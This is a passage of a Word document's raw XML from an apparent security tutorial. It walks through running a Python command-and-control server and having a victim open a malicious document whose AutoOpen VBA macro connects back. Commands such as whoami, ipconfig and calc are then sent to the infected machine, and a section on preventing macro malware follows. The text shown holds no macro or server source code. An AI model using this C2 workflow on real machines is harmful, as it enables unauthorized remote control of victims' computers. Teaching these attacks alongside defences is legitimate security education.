      <w:pPr>
        <w:pStyle w:val="Pharagraph"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Now that we have built our Command and Control (C2) system, let's see how to </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
        </w:rPr>
        <w:t>run the Python C2 server and interact with the infected machine</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C5B9CC9" w14:textId="4FBF8551" w:rsidR="00AD6B02" w:rsidRDefault="00AD6B02" w:rsidP="00A61341">
      <w:pPr>
        <w:pStyle w:val="Pharagraph"/>
      </w:pPr>
      <w:r>
        <w:t>Step 1. Running the Python C2 Server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="016A4F51" w14:textId="56D8D7F8" w:rsidR="00AD6B02" w:rsidRDefault="00AD6B02" w:rsidP="00A61341">
      <w:pPr>
        <w:pStyle w:val="Pharagraph"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00AD6B02">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t># python3 Server.py</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57E22BAB" w14:textId="77777777" w:rsidR="00CA44D3" w:rsidRPr="00AD6B02" w:rsidRDefault="00CA44D3" w:rsidP="00A61341">
      <w:pPr>
        <w:pStyle w:val="Pharagraph"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="22937D3B" w14:textId="6A280A46" w:rsidR="00AD6B02" w:rsidRPr="00CA44D3" w:rsidRDefault="00AD6B02" w:rsidP="00CA44D3">
      <w:pPr>
        <w:pStyle w:val="Pharagraph"/>
      </w:pPr>
      <w:r w:rsidRPr="00CA44D3">
        <w:t>Expected output</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68139417" w14:textId="35CFE801" w:rsidR="00AD6B02" w:rsidRDefault="00CA44D3" w:rsidP="00CA44D3">
      <w:pPr>
        <w:pStyle w:val="Pharagraph"/>
      </w:pPr>
      <w:r w:rsidRPr="00CA44D3">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6CD0113D" wp14:editId="1DBEA515">
            <wp:extent cx="5761990" cy="76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769620"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="04042BE2" w14:textId="2F143573" w:rsidR="00CA44D3" w:rsidRDefault="00CA44D3" w:rsidP="00A61341">
      <w:pPr>
        <w:pStyle w:val="Pharagraph"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="35534708" w14:textId="2486C328" w:rsidR="00CA44D3" w:rsidRDefault="00CA44D3" w:rsidP="00A61341">
      <w:pPr>
        <w:pStyle w:val="Pharagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">     </w:t>
      </w:r>
      <w:r>
        <w:t>At this point, the server is actively listening for any infected machine (victim) trying to connect.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60F9AD6C" w14:textId="34B544CC" w:rsidR="00CA44D3" w:rsidRDefault="00CA44D3" w:rsidP="00A61341">
      <w:pPr>
        <w:pStyle w:val="Pharagraph"/>
      </w:pPr>
      <w:r>
        <w:t>Step 2. Running the VBA Macro</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="291D0F51" w14:textId="00337BC8" w:rsidR="00CA44D3" w:rsidRDefault="00CA44D3" w:rsidP="00A61341">
      <w:pPr>
        <w:pStyle w:val="Pharagraph"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">The victim machine needs to open the malicious document containing the VBA macro. If </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
        </w:rPr>
        <w:t>AutoOpen()</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> is enabled, the code executes automatically without any user interaction.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52204B8C" w14:textId="2D9C4359" w:rsidR="00CA44D3" w:rsidRDefault="00CA44D3" w:rsidP="00A61341">
      <w:pPr>
        <w:pStyle w:val="Pharagraph"/>
      </w:pPr>
      <w:r w:rsidRPr="00CA44D3">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="26F331E6" wp14:editId="4B4C9B0E">
            <wp:extent cx="5761990" cy="1841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1841500"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="68635515" w14:textId="77777777" w:rsidR="00CA44D3" w:rsidRDefault="00CA44D3" w:rsidP="00A61341">
      <w:pPr>
        <w:pStyle w:val="Pharagraph"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5ED0781C" w14:textId="1CE3C0AC" w:rsidR="00CA44D3" w:rsidRDefault="00CA44D3" w:rsidP="00A61341">
      <w:pPr>
        <w:pStyle w:val="Pharagraph"/>
      </w:pPr>
      <w:r>
        <w:t>After the victim executes the VBA macro, the C2 server receives:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10066EF6" w14:textId="4FAE6A7E" w:rsidR="00CA44D3" w:rsidRDefault="00CA44D3" w:rsidP="00CA44D3">
      <w:pPr>
        <w:pStyle w:val="Pharagraph"/>
      </w:pPr>
      <w:r w:rsidRPr="00CA44D3">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="54058309" wp14:editId="734443A3">
            <wp:extent cx="5761990" cy="360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360045"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="71383EF5" w14:textId="3A2CE44D" w:rsidR="00CA44D3" w:rsidRDefault="00CA44D3" w:rsidP="00CA44D3">
      <w:pPr>
        <w:pStyle w:val="Pharagraph"/>
      </w:pPr>
      <w:r>
        <w:t>It then sends the default command (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:eastAsia="PMingLiU"/>
        </w:rPr>
        <w:t>whoami</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">). </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="673F2B26" w14:textId="253AB445" w:rsidR="00306EE4" w:rsidRDefault="00306EE4" w:rsidP="00CA44D3">
      <w:pPr>
        <w:pStyle w:val="Pharagraph"/>
      </w:pPr>
      <w:r>
        <w:t>Now, we can manually send more commands. For example, typing:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58228B04" w14:textId="2D474D3B" w:rsidR="00306EE4" w:rsidRPr="00306EE4" w:rsidRDefault="00306EE4" w:rsidP="00CA44D3">
      <w:pPr>
        <w:pStyle w:val="Pharagraph"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00306EE4">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>[C2] Enter next command: ipconfig</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="236A9D63" w14:textId="77777777" w:rsidR="00306EE4" w:rsidRDefault="00306EE4" w:rsidP="00CA44D3">
      <w:pPr>
        <w:pStyle w:val="Pharagraph"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2607DE63" w14:textId="38D29E42" w:rsidR="00306EE4" w:rsidRDefault="00306EE4" w:rsidP="00CA44D3">
      <w:pPr>
        <w:pStyle w:val="Pharagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The victim executes </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:eastAsia="PMingLiU"/>
        </w:rPr>
        <w:t>ipconfig</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> and returns the output:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="030E15F5" w14:textId="5F8F6E5E" w:rsidR="00306EE4" w:rsidRDefault="00306EE4" w:rsidP="00CA44D3">
      <w:pPr>
        <w:pStyle w:val="Pharagraph"/>
      </w:pPr>
      <w:r w:rsidRPr="00306EE4">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6F8191A0" wp14:editId="639B8021">
            <wp:extent cx="5761990" cy="143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1431925"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C89FA12" w14:textId="6D8DA93A" w:rsidR="00306EE4" w:rsidRDefault="00306EE4" w:rsidP="00CA44D3">
      <w:pPr>
        <w:pStyle w:val="Pharagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">We can open Calculation Application </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A7B3404" w14:textId="569D1605" w:rsidR="00306EE4" w:rsidRPr="00306EE4" w:rsidRDefault="00306EE4" w:rsidP="00306EE4">
      <w:pPr>
        <w:pStyle w:val="Pharagraph"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00306EE4">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00306EE4">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">[C2] Enter next command: </w:t>
      </w:r>
      <w:r w:rsidRPr="00306EE4">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>calc</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6362B4BA" w14:textId="15685FA0" w:rsidR="00306EE4" w:rsidRDefault="00306EE4" w:rsidP="00306EE4">
      <w:pPr>
        <w:pStyle w:val="Pharagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6029408F" wp14:editId="679BC82F">
            <wp:extent cx="5761990" cy="2478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2478405"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EA21333" w14:textId="5E5B90A9" w:rsidR="00306EE4" w:rsidRDefault="00306EE4" w:rsidP="00CA44D3">
      <w:pPr>
        <w:pStyle w:val="Pharagraph"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="79C98F37" w14:textId="5963EB5A" w:rsidR="00306EE4" w:rsidRDefault="00306EE4" w:rsidP="00CA44D3">
      <w:pPr>
        <w:pStyle w:val="Pharagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">To </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
        </w:rPr>
        <w:t>terminate the session</w:t>
      </w:r>
      <w:r>
        <w:t>, type:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6948BB74" w14:textId="713AF376" w:rsidR="00306EE4" w:rsidRDefault="00306EE4" w:rsidP="00CA44D3">
      <w:pPr>
        <w:pStyle w:val="Pharagraph"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00306EE4">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00306EE4">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>[C2] Enter next command: stop</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D9AE9C7" w14:textId="5137C26B" w:rsidR="00306EE4" w:rsidRDefault="00306EE4" w:rsidP="00CA44D3">
      <w:pPr>
        <w:pStyle w:val="Pharagraph"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00306EE4">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="001009FC" wp14:editId="343786B6">
            <wp:extent cx="5761990" cy="38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82270"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="632A5597" w14:textId="77777777" w:rsidR="00306EE4" w:rsidRPr="00306EE4" w:rsidRDefault="00306EE4" w:rsidP="00CA44D3">
      <w:pPr>
        <w:pStyle w:val="Pharagraph"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7F005ED3" w14:textId="1AA3F49F" w:rsidR="00306EE4" w:rsidRDefault="00306EE4" w:rsidP="00CA44D3">
      <w:pPr>
        <w:pStyle w:val="Pharagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="104CE853" wp14:editId="56FAC00A">
            <wp:extent cx="5761990" cy="1697990"/>
            <wp:effectExtent l="19050" t="19050" r="1016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1697990"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln w="3175">
                      <a:solidFill>
                        <a:schemeClr val="tx1"/>
                      </a:solidFill>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EEC28EB" w14:textId="64EA78D7" w:rsidR="009816E9" w:rsidRDefault="009816E9" w:rsidP="00CA44D3">
      <w:pPr>
        <w:pStyle w:val="Pharagraph"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="122AB629" w14:textId="77777777" w:rsidR="009816E9" w:rsidRDefault="009816E9" w:rsidP="00CA44D3">
      <w:pPr>
        <w:pStyle w:val="Pharagraph"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="24B635FE" w14:textId="1EAC4E14" w:rsidR="00306EE4" w:rsidRDefault="009816E9" w:rsidP="009816E9">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:b/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>VI.</w:t>
      </w:r>
      <w:r w:rsidR="00306EE4">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:b/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>Preventing Macro Malware Attacks</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D421EBF" w14:textId="77777777" w:rsidR="00306EE4" w:rsidRDefault="00306EE4" w:rsidP="009816E9">
      <w:r>
        <w:t xml:space="preserve">Macro malware is a type of malicious software that exploits </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
        </w:rPr>
        <w:t>macros</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> in applications like Microsoft Office to execute malicious commands. These attacks often spread through phishing emails with </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
        </w:rPr>
        <w:t>infected Word, Excel, or PowerPoint files</w:t>
      </w:r>
      <w:r>
        <w:t>. Once enabled, macros can download and execute harmful code, compromising the system.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CA27E8B" w14:textId="6F3233C3" w:rsidR="00306EE4" w:rsidRDefault="00306EE4" w:rsidP="009816E9"/>
    <w:p w14:paraId="30DD8FC3" w14:textId="2D9E8AE9" w:rsidR="00306EE4" w:rsidRDefault="00306EE4" w:rsidP="00AA3D72">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:b/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>1️</w:t>
      </w:r>
      <w:r w:rsidR="00AA3D72">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:b/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>Best Practices to Prevent Macro Malware Attacks</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EE0E9A8" w14:textId="77777777" w:rsidR="00306EE4" w:rsidRDefault="00306EE4" w:rsidP="00AA3D72">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>🔹</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:b/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> 1. Disable Macros by Default</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5570A640" w14:textId="77777777" w:rsidR="00306EE4" w:rsidRDefault="00306EE4" w:rsidP="00AA3D72">
      <w:pPr>
        <w:pStyle w:val="Pharagraph"/>
      </w:pPr>
      <w:r>
        <w:t>Microsoft Office applications allow users to disable macros.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DA6C562" w14:textId="77777777" w:rsidR="00306EE4" w:rsidRDefault="00306EE4" w:rsidP="00AA3D72">
      <w:pPr>
        <w:pStyle w:val="Pharagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
        </w:rPr>
        <w:t>Steps to disable macros:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61EF1C2A" w14:textId="77777777" w:rsidR="00306EE4" w:rsidRDefault="00306EE4" w:rsidP="00AA3D72">
      <w:pPr>
        <w:pStyle w:val="Pharagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="25"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Open </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
        </w:rPr>
        <w:t>Microsoft Word/Excel/PowerPoint</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D184FC0" w14:textId="77777777" w:rsidR="00306EE4" w:rsidRDefault="00306EE4" w:rsidP="00AA3D72">
      <w:pPr>
        <w:pStyle w:val="Pharagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="25"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Go to </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
        </w:rPr>
        <w:t>File</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> → </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
        </w:rPr>
        <w:t>Options</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> → </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
        </w:rPr>
        <w:t>Trust Center</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18B84016" w14:textId="77777777" w:rsidR="00306EE4" w:rsidRDefault="00306EE4" w:rsidP="00AA3D72">
      <w:pPr>
        <w:pStyle w:val="Pharagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="25"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Click </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
        </w:rPr>
        <w:t>Trust Center Settings</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> → </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
        </w:rPr>
        <w:t>Macro Settings</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F7F3C78" w14:textId="77777777" w:rsidR="00306EE4" w:rsidRDefault="00306EE4" w:rsidP="00AA3D72">
      <w:pPr>
        <w:pStyle w:val="Pharagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="25"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Select </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
        </w:rPr>
        <w:t>"Disable all macros with notification"</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> or </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
        </w:rPr>
        <w:t>"Disable all macros without notification"</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F3FB56F" w14:textId="733F9921" w:rsidR="00306EE4" w:rsidRDefault="00306EE4" w:rsidP="00AA3D72">
      <w:pPr>
        <w:pStyle w:val="Pharagraph"/>
      </w:pPr>
      <w:r>
        <w:t>This prevents macros from running automatically unless explicitly enabled by the user.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A206E9E" w14:textId="3643DACC" w:rsidR="00306EE4" w:rsidRDefault="00306EE4" w:rsidP="009816E9"/>
    <w:p w14:paraId="594070A6" w14:textId="77777777" w:rsidR="00306EE4" w:rsidRDefault="00306EE4" w:rsidP="00AA3D72">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>🔹</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:b/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> 2. Use Protected View</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="182E7490" w14:textId="77777777" w:rsidR="00306EE4" w:rsidRDefault="00306EE4" w:rsidP="00AA3D72">
      <w:pPr>
        <w:pStyle w:val="Pharagraph"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
        </w:rPr>
        <w:t>Office Protected View</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> restricts execution of macros in downloaded documents.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="493A6D23" w14:textId="77777777" w:rsidR="00306EE4" w:rsidRDefault="00306EE4" w:rsidP="00AA3D72">
      <w:pPr>
        <w:pStyle w:val="Pharagraph"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Ensure </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
        </w:rPr>
        <w:t>Protected View</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> is enabled under:</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
        </w:rPr>
        <w:t>File → Options → Trust Center → Protected View</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6179B3BA" w14:textId="26C0B37B" w:rsidR="00306EE4" w:rsidRDefault="00306EE4" w:rsidP="00AA3D72">
      <w:pPr>
        <w:pStyle w:val="Pharagraph"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>It prevents macro execution from untrusted sources.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14F0C283" w14:textId="642D88E4" w:rsidR="00306EE4" w:rsidRDefault="00306EE4" w:rsidP="009816E9"/>
    <w:p w14:paraId="7362CA31" w14:textId="77777777" w:rsidR="00306EE4" w:rsidRDefault="00306EE4" w:rsidP="00AA3D72">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>🔹</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:b/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> 3. Avoid Opening Suspicious Email Attachments</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FF3B941" w14:textId="77777777" w:rsidR="00306EE4" w:rsidRDefault="00306EE4" w:rsidP="00AA3D72">
      <w:pPr>
        <w:pStyle w:val="Pharagraph"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>Verify the sender’s identity before opening attachments.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3416CB68" w14:textId="77777777" w:rsidR="00306EE4" w:rsidRDefault="00306EE4" w:rsidP="00AA3D72">
      <w:pPr>
        <w:pStyle w:val="Pharagraph"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Be cautious of emails urging </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
        </w:rPr>
        <w:t>"Urgent Action Required"</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> or </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
        </w:rPr>
        <w:t>"Invoice Attached"</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6986119F" w14:textId="77777777" w:rsidR="00306EE4" w:rsidRDefault="00306EE4" w:rsidP="00AA3D72">
      <w:pPr>
        <w:pStyle w:val="Pharagraph"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
        </w:rPr>
